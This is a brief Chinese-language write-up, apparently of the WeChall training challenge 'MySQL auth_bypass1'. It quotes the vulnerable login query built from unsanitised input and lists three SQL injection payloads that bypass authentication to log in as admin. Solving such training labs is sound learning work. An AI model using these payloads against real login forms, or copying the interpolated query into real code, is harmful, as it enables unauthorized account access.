WeChall MySQL 注射题1

https://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php

题目要求是,使用admin 的账号登录。关键源代码是

SELECT * FROM users WHERE username='$username' AND password='$password'

因此,注入的答案有几个

admin'#

admin' or '1'='1

'|0#

你可能感兴趣的:(WeChall MySQL 注射题1)